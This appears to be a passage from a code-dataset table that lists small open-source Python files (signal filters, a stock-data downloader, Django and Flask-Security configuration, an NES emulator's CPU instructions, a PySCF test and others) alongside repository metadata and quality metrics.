hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
be62c8d9e725078536f0891cffbcc08c85ff6f54 | 979 | py | Python | my_general_helpers.py | arminbahl/drosophila_phototaxis_paper | e01dc95675f835926c9104b34bf6cfd7244dee2b | [
"MIT"
] | null | null | null | my_general_helpers.py | arminbahl/drosophila_phototaxis_paper | e01dc95675f835926c9104b34bf6cfd7244dee2b | [
"MIT"
] | null | null | null | my_general_helpers.py | arminbahl/drosophila_phototaxis_paper | e01dc95675f835926c9104b34bf6cfd7244dee2b | [
"MIT"
] | null | null | null | from scipy.signal import butter,filtfilt
from numba import jit
import bisect
def is_number_in_sorted_vector(sorted_vector, num):
index = bisect.bisect_left(sorted_vector, num)
return index != len(sorted_vector) and sorted_vector[index] == num
# def butter_lowpass(cutoff, fs, order=5):
# nyq = 0.5 * fs
# normal_cutoff = cutoff / nyq
# b, a = butter(order, normal_cutoff, btype='low', analog=False)
# return b, a
def butter_lowpass_filter(data, cutoff, fs, order):
nyq = 0.5 * fs # Nyquist Frequency
normal_cutoff = cutoff / nyq
# Get the filter coefficients
b, a = butter(order, normal_cutoff, btype='low', analog=False)
y = filtfilt(b, a, data)
return y
@jit
def first_order_lowpass_filter(signal_in, signal_out, tau, dt):
alpha_lowpass = dt / (tau + dt)
signal_out[0] = signal_in[0]
for i in range(1, len(signal_in)):
signal_out[i] = alpha_lowpass*signal_in[i] + (1-alpha_lowpass)*signal_out[i-1]
| 27.971429 | 86 | 0.684372 | 151 | 979 | 4.238411 | 0.344371 | 0.09375 | 0.046875 | 0.021875 | 0.1375 | 0.1375 | 0.1375 | 0.1375 | 0.1375 | 0.1375 | 0 | 0.012771 | 0.200204 | 979 | 34 | 87 | 28.794118 | 0.804598 | 0.225741 | 0 | 0 | 0 | 0 | 0.004 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0.222222 | 0.166667 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
be665281e674fbcee73480a5a06334a427283318 | 1,254 | py | Python | download.py | kaija/taiwan_stockloader | 637244c3b0bc96093cc5a7b3df093a829f9e3c2d | [
"MIT"
] | 2 | 2015-06-13T09:17:46.000Z | 2015-10-25T15:31:33.000Z | download.py | kaija/taiwan_stockloader | 637244c3b0bc96093cc5a7b3df093a829f9e3c2d | [
"MIT"
] | null | null | null | download.py | kaija/taiwan_stockloader | 637244c3b0bc96093cc5a7b3df093a829f9e3c2d | [
"MIT"
] | 3 | 2016-02-01T07:36:55.000Z | 2018-08-03T12:22:20.000Z | import datetime
import httplib
import urllib
from datetime import timedelta
#now = datetime.datetime.now();
#today = now.strftime('%Y-%m-%d')
#print today
def isfloat(value):
try:
float(value)
return True
except ValueError:
return False
def convfloat(value):
try:
return float(value)
except ValueError:
return -1
today = datetime.date.today()
one_day = timedelta(days=1);
#start_day = datetime.date(2004, 2, 11);
start_day = datetime.date(2010, 8, 21);
print "Download from " + start_day.strftime("%Y-%m-%d") + " to " + today.strftime("%Y-%m-%d")
dl_date = start_day
while dl_date < today:
httpreq = httplib.HTTPConnection('www.twse.com.tw')
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
date_str = str(dl_date.year - 1911 ) + dl_date.strftime("/%m/%d")
form = urllib.urlencode({'download': 'csv', 'qdate': date_str, 'selectType': 'ALLBUT0999'})
httpreq.request("POST", "/ch/trading/exchange/MI_INDEX/MI_INDEX.php", form, headers);
httpres = httpreq.getresponse()
stock_csv = httpres.read()
file_name = "data/" + dl_date.strftime("%Y%m%d") + ".csv"
print "downloading " + file_name
f = open(file_name, "w")
f.write(stock_csv)
dl_date += one_day
print "Download Finish!"
| 23.660377 | 93 | 0.692185 | 181 | 1,254 | 4.679558 | 0.469613 | 0.042503 | 0.047226 | 0.051948 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022181 | 0.137161 | 1,254 | 52 | 94 | 24.115385 | 0.760628 | 0.089314 | 0 | 0.117647 | 0 | 0 | 0.212841 | 0.065963 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.117647 | null | null | 0.088235 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
be687c8fd20a0765459343471aaeb0dc60aa0c2b | 666 | py | Python | evennia/scripts/migrations/0013_auto_20191025_0831.py | Jaykingamez/evennia | cf7cab1fea99ede3efecb70a65c3eb0fba1d3745 | [
"BSD-3-Clause"
] | 1,544 | 2015-01-01T22:16:31.000Z | 2022-03-31T19:17:45.000Z | evennia/scripts/migrations/0013_auto_20191025_0831.py | Jaykingamez/evennia | cf7cab1fea99ede3efecb70a65c3eb0fba1d3745 | [
"BSD-3-Clause"
] | 1,686 | 2015-01-02T18:26:31.000Z | 2022-03-31T20:12:03.000Z | evennia/scripts/migrations/0013_auto_20191025_0831.py | Jaykingamez/evennia | cf7cab1fea99ede3efecb70a65c3eb0fba1d3745 | [
"BSD-3-Clause"
] | 867 | 2015-01-02T21:01:54.000Z | 2022-03-29T00:28:27.000Z | # Generated by Django 2.2.6 on 2019-10-25 12:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("scripts", "0012_auto_20190128_1820")]
operations = [
migrations.AlterField(
model_name="scriptdb",
name="db_typeclass_path",
field=models.CharField(
db_index=True,
help_text="this defines what 'type' of entity this is. This variable holds a Python path to a module with a valid Evennia Typeclass.",
max_length=255,
null=True,
verbose_name="typeclass",
),
)
]
| 28.956522 | 150 | 0.587087 | 76 | 666 | 5.013158 | 0.763158 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075556 | 0.324324 | 666 | 22 | 151 | 30.272727 | 0.771111 | 0.067568 | 0 | 0 | 1 | 0.0625 | 0.298869 | 0.037157 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
be6d27c87017d3ff2b758a9a1954cf3e265b550c | 554 | py | Python | iocms/iocms/urls.py | Gaurav-Zaiswal/iw-acad-iocms-be | a133f120eed93433925608f08c5145d2d0d1db39 | [
"MIT"
] | null | null | null | iocms/iocms/urls.py | Gaurav-Zaiswal/iw-acad-iocms-be | a133f120eed93433925608f08c5145d2d0d1db39 | [
"MIT"
] | null | null | null | iocms/iocms/urls.py | Gaurav-Zaiswal/iw-acad-iocms-be | a133f120eed93433925608f08c5145d2d0d1db39 | [
"MIT"
] | 2 | 2021-09-16T04:44:59.000Z | 2021-09-16T05:45:31.000Z | from django.contrib import admin
from django.urls import include, path
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('class/', include('classroom.urls')),
path('assignment-api/', include('assignment.urls', namespace='assignment')),
path('feed/', include('feed.urls', namespace='feed')),
path('users/', include('users.urls'), name="user-register")
]
if settings.DEBUG:
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 36.933333 | 80 | 0.720217 | 70 | 554 | 5.657143 | 0.414286 | 0.10101 | 0.070707 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117329 | 554 | 14 | 81 | 39.571429 | 0.809816 | 0 | 0 | 0 | 0 | 0 | 0.203971 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.307692 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
be6f16523ef2463524119c42f75567ed0f66d560 | 1,905 | py | Python | src/security/__init__.py | slippers/blogging_security_flatpage | 53644978b798c66369416b1e5625cc04d89c0a87 | [
"MIT"
] | 1 | 2018-12-31T05:30:13.000Z | 2018-12-31T05:30:13.000Z | src/security/__init__.py | slippers/blogging_security_flatpage | 53644978b798c66369416b1e5625cc04d89c0a87 | [
"MIT"
] | null | null | null | src/security/__init__.py | slippers/blogging_security_flatpage | 53644978b798c66369416b1e5625cc04d89c0a87 | [
"MIT"
] | null | null | null | from src import app, db
from .models import User, Role, RoleUsers
from .security_admin import UserAdmin, RoleAdmin
from flask_security import Security, SQLAlchemyUserDatastore, \
login_required, roles_accepted
from flask_security.utils import encrypt_password
def config_security_admin(admin):
admin.add_view(UserAdmin(db.session))
admin.add_view(RoleAdmin(db.session))
def configure_security():
# Create the Roles "admin" and "end-user" -- unless they already exist
user_datastore.find_or_create_role(name='admin', description='Administrator')
user_datastore.find_or_create_role(name='end-user', description='End user')
user_datastore.find_or_create_role(name='blogger', description='Blogger')
# Create two Users for testing purposes -- unless they already exists.
# In each case, use Flask-Security utility function to encrypt the password.
pw = encrypt_password('password')
# pw = 'password'
if not user_datastore.get_user('someone@example.com'):
user_datastore.create_user(email='someone@example.com', password=pw)
if not user_datastore.get_user('admin@example.com'):
user_datastore.create_user(email='admin@example.com', password=pw)
# Give one User has the "end-user" role, while the other has the "admin" role.
#(This will have no effect if the
# Users already have these Roles.) Again, commit any database changes.
user_datastore.add_role_to_user('someone@example.com', 'end-user')
user_datastore.add_role_to_user('someone@example.com', 'blogger')
user_datastore.add_role_to_user('admin@example.com', 'admin')
user_datastore.add_role_to_user('admin@example.com', 'blogger')
db.session.commit()
# Setup Flask-Security
user_datastore = SQLAlchemyUserDatastore(db, User, Role)
security = Security(app, user_datastore)
# Create any database tables that don't exist yet.
db.create_all()
| 40.531915 | 83 | 0.752756 | 265 | 1,905 | 5.218868 | 0.328302 | 0.122198 | 0.049168 | 0.057845 | 0.284165 | 0.284165 | 0.248012 | 0.121475 | 0.121475 | 0 | 0 | 0 | 0.143307 | 1,905 | 46 | 84 | 41.413043 | 0.847426 | 0.251969 | 0 | 0 | 0 | 0 | 0.160537 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0.153846 | 0.192308 | 0 | 0.269231 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
be76f999496b5e5961109377d7a8e9bebf2c7e1e | 2,576 | py | Python | regexem.py | lvijay/ilc | 1c3b1381e7e5a5064bda829e3d34bfaf24745d1a | [
"BSD-3-Clause-No-Nuclear-Warranty"
] | 1 | 2019-01-03T17:44:11.000Z | 2019-01-03T17:44:11.000Z | regexem.py | lvijay/ilc | 1c3b1381e7e5a5064bda829e3d34bfaf24745d1a | [
"BSD-3-Clause-No-Nuclear-Warranty"
] | null | null | null | regexem.py | lvijay/ilc | 1c3b1381e7e5a5064bda829e3d34bfaf24745d1a | [
"BSD-3-Clause-No-Nuclear-Warranty"
] | null | null | null | #!/usr/bin/python
# -*- mode: python; -*-
## This file is part of Indian Language Converter
## Copyright (C) 2006 Vijay Lakshminarayanan <liyer.vijay@gmail.com>
## Indian Language Converter is free software; you can redistribute it
## and/or modify it under the terms of the GNU General Public License
## as published by the Free Software Foundation; either version 2 of
## the License, or (at your option) any later version.
## This program is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
## 02110-1301, USA.
## $Id: regexem.py,v 1.4 2006-03-26 03:15:24 vijay Exp $
## Author: Vijay Lakshminarayanan
## $Date: 2006-03-26 03:15:24 $
import sys
from re import escape
def regexem (strlst):
"""Returns a single string which is the regular expression to
identify any single word in the given argument.
See the Examples given at the end of this file."""
return regexem_internal([escape(s) for s in strlst])
def regexem_internal (strlst):
strlst.sort()
s, rest = strlst[0], strlst[1:]
groups = {}
groups[s] = [s]
for string in rest:
if string.startswith(s) and len(s) < len(string): # avoid duplicates
groups[s].append(string[len(s):]) # add the suffix to the group
else:
s = string # a fresh prefix
groups[s] = [s]
regex = ''
for prefix, words in groups.items():
inreg = ''
if len(words) == 2: # i.e. words[0] is a subset of words[1]
inreg += words[0] + '(' + words[1] + ')' + '?'
elif len(words) > 2:
inreg += words[0] + '(' + regexem_internal(words[1:]) + ')' + '?'
else:
inreg += prefix # since prefix == words[0] in this case.
regex += '(' + inreg + ')' + '|'
return regex[:-1] # we don't need the last '|'
if __name__ == '__main__':
print ''.join(regexem(sys.argv[1:]))
## Examples
#
# $ ./regexem.py emacs vi ed
# (ed)|(emacs)|(vi)
#
# $ ./regexem.py batsman bats well
# (well)|(bats(man)?)
#
# $ ./regexem.py houses housefly
# (houses)|(housefly) ## Note that they aren't grouped together
#
## a slightly complicated example
# $ ./regexem.py an anteater and an ant
# (an((d)|(t(eater)?))?)
| 33.025641 | 77 | 0.632376 | 373 | 2,576 | 4.337802 | 0.490617 | 0.027812 | 0.024104 | 0.035229 | 0.067985 | 0.051916 | 0 | 0 | 0 | 0 | 0 | 0.029828 | 0.232143 | 2,576 | 77 | 78 | 33.454545 | 0.78817 | 0.552407 | 0 | 0.142857 | 0 | 0 | 0.018418 | 0 | 0.035714 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.071429 | null | null | 0.035714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
be876cf3ef298b948a6559bdc7b9b04da2062463 | 589 | py | Python | 0201-0300/0251-Flatten 2D Vector/0251-Flatten 2D Vector.py | jiadaizhao/LeetCode | 4ddea0a532fe7c5d053ffbd6870174ec99fc2d60 | [
"MIT"
] | 49 | 2018-05-05T02:53:10.000Z | 2022-03-30T12:08:09.000Z | 0201-0300/0251-Flatten 2D Vector/0251-Flatten 2D Vector.py | jolly-fellow/LeetCode | ab20b3ec137ed05fad1edda1c30db04ab355486f | [
"MIT"
] | 11 | 2017-12-15T22:31:44.000Z | 2020-10-02T12:42:49.000Z | 0201-0300/0251-Flatten 2D Vector/0251-Flatten 2D Vector.py | jolly-fellow/LeetCode | ab20b3ec137ed05fad1edda1c30db04ab355486f | [
"MIT"
] | 28 | 2017-12-05T10:56:51.000Z | 2022-01-26T18:18:27.000Z | class Vector2D:
def __init__(self, v: List[List[int]]):
def getIt():
for row in v:
for val in row:
yield val
self.it = iter(getIt())
self.val = next(self.it, None)
def next(self) -> int:
result = self.val
self.val = next(self.it, None)
return result
def hasNext(self) -> bool:
return self.val is not None
# Your Vector2D object will be instantiated and called as such:
# obj = Vector2D(v)
# param_1 = obj.next()
# param_2 = obj.hasNext()
| 22.653846 | 63 | 0.519525 | 77 | 589 | 3.896104 | 0.480519 | 0.093333 | 0.073333 | 0.1 | 0.14 | 0.14 | 0 | 0 | 0 | 0 | 0 | 0.013587 | 0.375212 | 589 | 25 | 64 | 23.56 | 0.80163 | 0.210526 | 0 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0 | 0.071429 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
be8cef6fbad82834998e279653a3e939a968c9d8 | 2,244 | py | Python | instructions/instructions.py | fernandozanutto/PyNES | cb8d589ceb55cd7df0e114e726c6b6bbbc556172 | [
"Apache-2.0"
] | null | null | null | instructions/instructions.py | fernandozanutto/PyNES | cb8d589ceb55cd7df0e114e726c6b6bbbc556172 | [
"Apache-2.0"
] | null | null | null | instructions/instructions.py | fernandozanutto/PyNES | cb8d589ceb55cd7df0e114e726c6b6bbbc556172 | [
"Apache-2.0"
] | null | null | null | from addressing import *
from instructions.base_instructions import SetBit, ClearBit
from instructions.generic_instructions import Instruction
from status import Status
# set status instructions
class Sec(SetBit):
identifier_byte = bytes([0x38])
bit = Status.StatusTypes.carry
class Sei(SetBit):
identifier_byte = bytes([0x78])
bit = Status.StatusTypes.interrupt
class Sed(SetBit):
identifier_byte = bytes([0xF8])
bit = Status.StatusTypes.decimal
# clear status instructions
class Cld(ClearBit):
identifier_byte = bytes([0xD8])
bit = Status.StatusTypes.decimal
class Clc(ClearBit):
identifier_byte = bytes([0x18])
bit = Status.StatusTypes.carry
class Clv(ClearBit):
identifier_byte = bytes([0xB8])
bit = Status.StatusTypes.overflow
class Cli(ClearBit):
identifier_byte = bytes([0x58])
bit = Status.StatusTypes.interrupt
class Bit(Instruction):
@classmethod
def get_data(cls, cpu, memory_address, data_bytes) -> Optional[int]:
return cpu.bus.read_memory(memory_address)
@classmethod
def apply_side_effects(cls, cpu, memory_address, value):
and_result = cpu.a_reg & value
cpu.status_reg.bits[Status.StatusTypes.zero] = not and_result
cpu.status_reg.bits[Status.StatusTypes.overflow] = (
value & (1 << 6)) > 0
cpu.status_reg.bits[Status.StatusTypes.negative] = (
value & (1 << 7)) > 0
class BitZeroPage(ZeroPageAddressing, Bit):
identifier_byte = bytes([0x24])
class BitAbsolute(AbsoluteAddressing, Bit):
identifier_byte = bytes([0x2C])
class Brk(ImplicitAddressing, Instruction):
identifier_byte = bytes([0x00])
@classmethod
def get_data(cls, cpu, memory_address, data_bytes) -> Optional[int]:
return super().get_data(cpu, memory_address, data_bytes)
@classmethod
def write(cls, cpu, memory_address, value):
cpu.push_to_stack(cpu.pc_reg + 1, 2)
cpu.push_to_stack(cpu.status_reg.to_int() | (1 << 4), 1)
@classmethod
def apply_side_effects(cls, cpu, memory_address, value):
cpu.status_reg.bits[Status.StatusTypes.interrupt] = 1
cpu.running = False
@classmethod
def get_cycles(cls):
return 7
| 25.213483 | 72 | 0.69385 | 275 | 2,244 | 5.498182 | 0.309091 | 0.123677 | 0.125661 | 0.062831 | 0.388889 | 0.267196 | 0.205688 | 0.15873 | 0.15873 | 0.15873 | 0 | 0.021715 | 0.199643 | 2,244 | 88 | 73 | 25.5 | 0.820156 | 0.021836 | 0 | 0.280702 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018248 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.070175 | 0.052632 | 0.719298 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
be917ccdfeb7754dd0eabc0327954755752723d8 | 425 | py | Python | Estrutura_Decisao/who.py | M3nin0/supreme-broccoli | 186c1ea3b839ba3139f9301660dec8fbd27a162e | [
"Apache-2.0"
] | null | null | null | Estrutura_Decisao/who.py | M3nin0/supreme-broccoli | 186c1ea3b839ba3139f9301660dec8fbd27a162e | [
"Apache-2.0"
] | null | null | null | Estrutura_Decisao/who.py | M3nin0/supreme-broccoli | 186c1ea3b839ba3139f9301660dec8fbd27a162e | [
"Apache-2.0"
] | null | null | null | prod1 = float(input("Insira o valor do produto A: "))
prod2 = float(input("Insira o valor do produto B: "))
prod3 = float(input("Insira o valor do produto C: "))
if prod1 < prod2 and prod1 < prod3:
print ("Escolha o produto A é o mais barato")
elif prod2 < prod1 and prod2 < prod3:
print ("Escolha o produto B é o mais barato")
elif prod3 < prod1 and prod3 < prod2:
print ("Escolha o produto C é o mais barato")
| 38.636364 | 53 | 0.68 | 72 | 425 | 4.013889 | 0.291667 | 0.103806 | 0.16609 | 0.176471 | 0.605536 | 0.321799 | 0.321799 | 0 | 0 | 0 | 0 | 0.04491 | 0.214118 | 425 | 10 | 54 | 42.5 | 0.820359 | 0 | 0 | 0 | 0 | 0 | 0.451765 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
be99d62141111a8ad89510bea1e2a527e33cf08b | 478 | py | Python | autodiff/debug_vjp.py | Jakob-Unfried/msc-legacy | 2c41f3f714936c25dd534bd66da802c26176fcfa | [
"MIT"
] | 1 | 2021-03-22T14:16:43.000Z | 2021-03-22T14:16:43.000Z | autodiff/debug_vjp.py | Jakob-Unfried/msc-legacy | 2c41f3f714936c25dd534bd66da802c26176fcfa | [
"MIT"
] | null | null | null | autodiff/debug_vjp.py | Jakob-Unfried/msc-legacy | 2c41f3f714936c25dd534bd66da802c26176fcfa | [
"MIT"
] | null | null | null | import pdb
import warnings
from jax import custom_vjp
@custom_vjp
def debug_identity(x):
"""
acts as identity, but inserts a pdb trace on the backwards pass
"""
warnings.warn('Using a module intended for debugging')
return x
def _debug_fwd(x):
warnings.warn('Using a module intended for debugging')
return x, x
# noinspection PyUnusedLocal
def _debug_bwd(x, g):
pdb.set_trace()
return g
debug_identity.defvjp(_debug_fwd, _debug_bwd)
| 17.071429 | 67 | 0.713389 | 71 | 478 | 4.619718 | 0.492958 | 0.073171 | 0.103659 | 0.109756 | 0.310976 | 0.310976 | 0.310976 | 0.310976 | 0.310976 | 0.310976 | 0 | 0 | 0.209205 | 478 | 27 | 68 | 17.703704 | 0.867725 | 0.190377 | 0 | 0.142857 | 0 | 0 | 0.199461 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.214286 | 0 | 0.642857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bea3fce840a92d3dac26a2f605494f57192e6efe | 1,217 | py | Python | pyscf/nao/test/test_0037_aos.py | fdmalone/pyscf | 021b17ac721e292b277d2b740e2ff8ab38bb6a4a | [
"Apache-2.0"
] | 1 | 2019-07-01T12:39:45.000Z | 2019-07-01T12:39:45.000Z | pyscf/nao/test/test_0037_aos.py | fdmalone/pyscf | 021b17ac721e292b277d2b740e2ff8ab38bb6a4a | [
"Apache-2.0"
] | null | null | null | pyscf/nao/test/test_0037_aos.py | fdmalone/pyscf | 021b17ac721e292b277d2b740e2ff8ab38bb6a4a | [
"Apache-2.0"
] | null | null | null | # Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, division
import os,unittest,numpy as np
class KnowValues(unittest.TestCase):
def test_aos_libnao(self):
""" Computing of the atomic orbitals """
from pyscf.nao import system_vars_c
from pyscf.tools.cubegen import Cube
sv = system_vars_c().init_siesta_xml(label='water', cd=os.path.dirname(os.path.abspath(__file__)))
cc = Cube(sv, nx=20, ny=20, nz=20)
aos = sv.comp_aos_den(cc.get_coords())
self.assertEqual(aos.shape[0], cc.nx*cc.ny*cc.nz)
